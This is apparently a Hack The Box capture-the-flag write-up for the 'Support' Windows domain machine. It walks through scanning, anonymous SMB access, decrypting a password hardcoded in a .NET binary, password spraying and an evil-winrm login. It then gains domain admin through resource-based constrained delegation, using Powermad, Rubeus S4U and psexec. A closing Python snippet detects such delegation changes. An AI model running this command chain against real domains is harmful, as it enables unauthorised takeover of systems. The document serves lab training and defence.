Contents
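Connect to the HTB server and start the target machine
Information gathering
Run an open-port scan of the target's TCP ports with rustscan
Extract and save the target's open TCP port numbers
Run script and service scans against the open TCP ports with nmap
Run vulnerability and OS scans against the open TCP ports with nmap
Run an open-port scan of the target's common UDP ports with nmap
Enumerate the root node of the target's LDAP server with ldapsearch
Enumerate the target's SMB shares as an anonymous account with smbmap
Enumerate the files in the support-tools share with smbmap
Initial foothold
Check how UserInfo.exe was compiled with Exeinfope
Decompile the EXE with ILSpy
Check the password against the target's ldap account with netexec
Run and debug the EXE in a Windows environment
Try querying user information with the EXE
Enumerate domain accounts with kerbrute using the name list above
Enumerate the target's LDAP server with ldapsearch
Enumerate the target's domain users with windapsearch
Password-spray the target's SMB service with netexec using the name list and password above
Log in to the target's WinRM service with evil-winrm using the credentials above
Privilege escalation
Upload SharpHound to the target
Run it to collect domain information from the target
Analyze the collected data with BloodHound
Upload and load the PowerView.ps1 script from the attack machine
Upload Powermad to the target
Add a new computer account to the domain
Upload Rubeus to the target
Forge a service ticket with Rubeus by impersonating the administrator through an S4U attack
Convert the ticket with impacket-ticketConverter
Log in to the target with impacket-psexec using the administrator ticket

Connect to the HTB server and start the target machine

Assigned IP: 10.10.16.21
Target IP: 10.10.11.174
Target domain: support.htb

Information gathering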
Run an open-port scan of the target's TCP ports with rustscan

    rustscan -a 10.10.11.174 -r 1-65535 --ulimit 5000 | tee res

Extract and save the target's open TCP port numbers

    ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)

    ┌──(root㉿kali)-[/home/kali/Desktop/temp]
    └─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
    53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739
    ┌──(root㉿kali)-[/home/kali/Desktop/temp]
    └─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
    ┌──(root㉿kali)-[/home/kali/Desktop/temp]
    └─# echo $ports
    53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739

Run script and service scans against the open TCP ports with nmap

    nmap -sT -p$ports -sCV -Pn 10.10.11.174

Ports and services that deserve close attention:

    Port 53: Domain service
    Port 88: Kerberos service
    Port 389: LDAP service
    Port 445: SMB service
    Port 5985: WinRM service

Run vulnerability and OS scans against the open TCP ports with nmap

    nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.174

Run an open-port scan of the target's common UDP ports with nmap

    nmap -sU --top-ports 20 -Pn 10.10.11.174

Enumerate the root node of the target's LDAP server with ldapsearch

    ldapsearch -H ldap://10.10.11.174 -x -s base namingcontexts

Enumerate the target's SMB shares as an anonymous account with smbmap

    smbmap -u guest -H 10.10.11.174

Enumerate the files in the support-tools share with smbmap

    smbmap -u guest -H 10.10.11.174 -r support-tools

Download the UserInfo.exe.zip file to the attack machine

    smbmap -u guest -H 10.10.11.174 -r support-tools -A UserInfo.exe.zip

Extract the archive with unzip

    unzip 10.10.11.174-support-tools_UserInfo.exe.zip -d UserInfo

Initial foothold
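Check how UserInfo.exe was compiled with Exeinfope

The tool output shows that the executable was compiled for the .NET Framework and is not packed.

Decompile the EXE with ILSpy

The decompiled source exposes the key and the encryption routine. Hand both to an LLM and have it rewrite them as Python so the routine can be run directly:

    import base64


    class Protected:
        # Obfuscated password and XOR key recovered from the decompiled binary
        _enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
        _key = b"armando"

        @staticmethod
        def get_password():
            # Decode the Base64 string
            encrypted_data = base64.b64decode(Protected._enc_password)
            decrypted_data = bytearray(encrypted_data)
            # Decrypt: XOR each byte with the repeating key, then with 0xDF
            for i in range(len(decrypted_data)):
                decrypted_data[i] ^= Protected._key[i % len(Protected._key)] ^ 0xDF
            # Return the decrypted string
            return decrypted_data.decode("utf-8")


    # Test
    if __name__ == "__main__":
        password = Protected.get_password()
        print("Decrypted Password:", password)

Running it yields the password:

    nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Check the password against the target's ldap account with netexec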
    netexec smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

Run and debug the EXE in a Windows environment

    .\UserInfo.exe find -first *

Try querying user information with the EXE

    .\UserInfo.exe user -username langley.lucy

Enumerate domain accounts with kerbrute using the name list above

    kerbrute userenum -d support.htb --dc 10.10.11.174 ./names.txt

Good: every name on the list is a valid domain user. This is not much use yet, though, because the list may be incomplete.

Enumerate the target's LDAP server with ldapsearch

    ldapsearch -H ldap://10.10.11.174 -x -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep -C5 info:

This returns a string that looks like a password:

    Ironside47pleasure40Watchful

Enumerate the target's domain users with windapsearch

    windapsearch -d support.htb --dc 10.10.11.174 -u 'ldap@support.htb' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -U | grep cn: | cut -d' ' -f2

Password-spray the target's SMB service with netexec using the name list and password above

    netexec smb 10.10.11.174 -u ./names.txt -p Ironside47pleasure40Watchful --continue-on-success

    Account: support
    Password: Ironside47pleasure40Watchful

Log in to the target's WinRM service with evil-winrm using the credentials above

    evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful

The user.txt file is in the C:\Users\support\Desktop directory.

Privilege escalation
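Upload SharpHound to the target

    upload SharpHound.exe

Run it to collect domain information from the target

    .\SharpHound.exe -c all

Download the generated .zip file to the attack machine

    download 20250124070955_BloodHound.zip

Analyze the collected data with BloodHound

First look at the domain admins, then view the shortest paths to unconstrained delegation systems. The graph shows that the current account has PS control over the domain controller DC.

Upload and load the PowerView.ps1 script from the attack machine

    . .\PowerView.ps1

Query the domain controller name and the target's OS version

    Get-DomainController | Select Name,OSVersion | Format-List

    *Evil-WinRM* PS C:\ProgramData> Get-DomainController | Select Name,OSVersion | Format-List

    Name      : dc.support.htb
    OSVersion : Windows Server 2022 Standard

Query the Kerberos constrained delegation settings on the DC account

    Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity

    *Evil-WinRM* PS C:\ProgramData> Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity

    name msds-allowedtoactonbehalfofotheridentity
    ---- ----------------------------------------
    DC

The output shows that no other computer account is currently configured for constrained delegation to the DC account.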
Upload Powermad to the target

    upload Powermad.ps1

Load the script on the target

    . .\Powermad.ps1

Add a new computer account to the domain

    New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString 123456 -AsPlainText -Force)

    *Evil-WinRM* PS C:\ProgramData> New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString 123456 -AsPlainText -Force)
    [+] Machine account x0da6h added

Grant this computer account constrained delegation rights to act on behalf of others to DC

    Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount x0da6h$

Query the principals that are allowed to delegate to DC

    Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount

The output shows that DC now allows x0da6h$ to perform constrained delegation.

Upload Rubeus to the target

    upload Rubeus_x64.exe
Use Rubeus to generate the domain password hashes for the forged computer account x0da6h$

    .\Rubeus_x64.exe hash /password:123456 /user:x0da6h$ /domain:support.htb

    [*] Action: Calculate Password Hash(es)
    [*] Input password : 123456
    [*] Input username : x0da6h$
    [*] Input domain : support.htb
    [*] Salt : SUPPORT.HTBhostx0da6h.support.htb
    [*] rc4_hmac : 32ED87BDB5FDC5E9CBA88547376818D4
    [*] aes128_cts_hmac_sha1 : 55843795AF436FD006A73ECEDE4C23C3
    [*] aes256_cts_hmac_sha1 : 0FA84858304070B093E0712973F00F1BD075DBE3A59741DBE6B5811CBBFBBF7E
    [*] des_cbc_md5 : DCAD7523D389D054
Forge a service ticket with Rubeus by impersonating the administrator through an S4U attack

    .\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap

    *Evil-WinRM* PS C:\ProgramData> .\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap

    v2.3.2

    [*] Action: S4U
    [*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
    [*] Building AS-REQ (w/ preauth) for: support.htb\x0da6h$
    [*] Using domain controller: ::1:88
    [+] TGT request successful!
    [*] base64(ticket.kirbi): <base64 ticket omitted>

    [*] Action: S4U
    [*] Building S4U2self request for: x0da6h$@SUPPORT.HTB
    [*] Using domain controller: dc.support.htb (::1)
    [*] Sending S4U2self request to ::1:88
    [+] S4U2self success!
    [*] Got a TGS for administrator to x0da6h$@SUPPORT.HTB
    [*] base64(ticket.kirbi): <base64 ticket omitted>

    [*] Impersonating user administrator to target SPN host/dc.support.htb
    [*] Building S4U2proxy request for service: host/dc.support.htb
    [*] Using domain controller: dc.support.htb (::1)
    [*] Sending S4U2proxy request to domain controller ::1:88
    [+] S4U2proxy success!
    [*] base64(ticket.kirbi) for SPN host/dc.support.htb: <base64 ticket omitted>
    [+] Ticket successfully imported!
Base64-decode the ticket and save it to a file

    echo '<base64 ticket omitted>' | base64 -d > administrator.kirbi

Convert the ticket with impacket-ticketConverter

    impacket-ticketConverter administrator.kirbi administrator.ccache

Synchronize the local clock with the target domain controller using ntpdate

    ntpdate dc.support.htb

Log in to the target with impacket-psexec using the administrator ticket

    KRB5CCNAME=./administrator.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass

The root.txt file is in the C:\Users\Administrator\Desktop directory.
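
The defender's view of the privilege-escalation steps above, as an added example that is not part of the original write-up: it flags any write to the delegation attribute queried earlier and raises the severity when the same account created a machine account shortly before. Event IDs 4741 (computer account created) and 5136 (directory service object modified) are real Windows Security events; the flattened field names, timestamps, the DC's distinguished name and the WS01$ account are constructed for illustration.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
DC_DN = "CN=DC,OU=Domain Controllers,DC=support,DC=htb"  # constructed DN

# Constructed, simplified events (not a real log export).
SAMPLE_EVENTS = [
    {"time": "2025-01-24T07:20:11", "id": 4741, "subject": "support", "target": "x0da6h$"},
    {"time": "2025-01-24T07:21:40", "id": 5136, "subject": "support",
     "object_dn": DC_DN, "attribute": RBCD_ATTR},
    {"time": "2025-01-24T09:00:00", "id": 5136, "subject": "administrator",
     "object_dn": DC_DN, "attribute": "description"},
    {"time": "2025-01-24T10:00:00", "id": 4741, "subject": "administrator", "target": "WS01$"},
]


def find_rbcd_changes(events, window=timedelta(hours=1)):
    """Alert on every write to the delegation attribute.

    Severity is "high" when the writing subject also created a machine
    account within `window` before the write, otherwise "medium".
    """
    created = {}  # subject -> [(creation time, machine account name)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        subject = ev["subject"].lower()
        if ev["id"] == 4741:
            created.setdefault(subject, []).append((ts, ev["target"]))
        elif ev["id"] == 5136 and ev.get("attribute", "").lower() == RBCD_ATTR.lower():
            recent = [name for t, name in created.get(subject, []) if ts - t <= window]
            alerts.append({
                "time": ev["time"],
                "subject": ev["subject"],
                "object_dn": ev["object_dn"],
                "new_machine_accounts": recent,
                "severity": "high" if recent else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_rbcd_changes(SAMPLE_EVENTS):
        print(alert)
```

Event 5136 is only logged when directory service change auditing is enabled and the object carries a matching audit entry, so confirm both on domain controller objects before relying on this correlation.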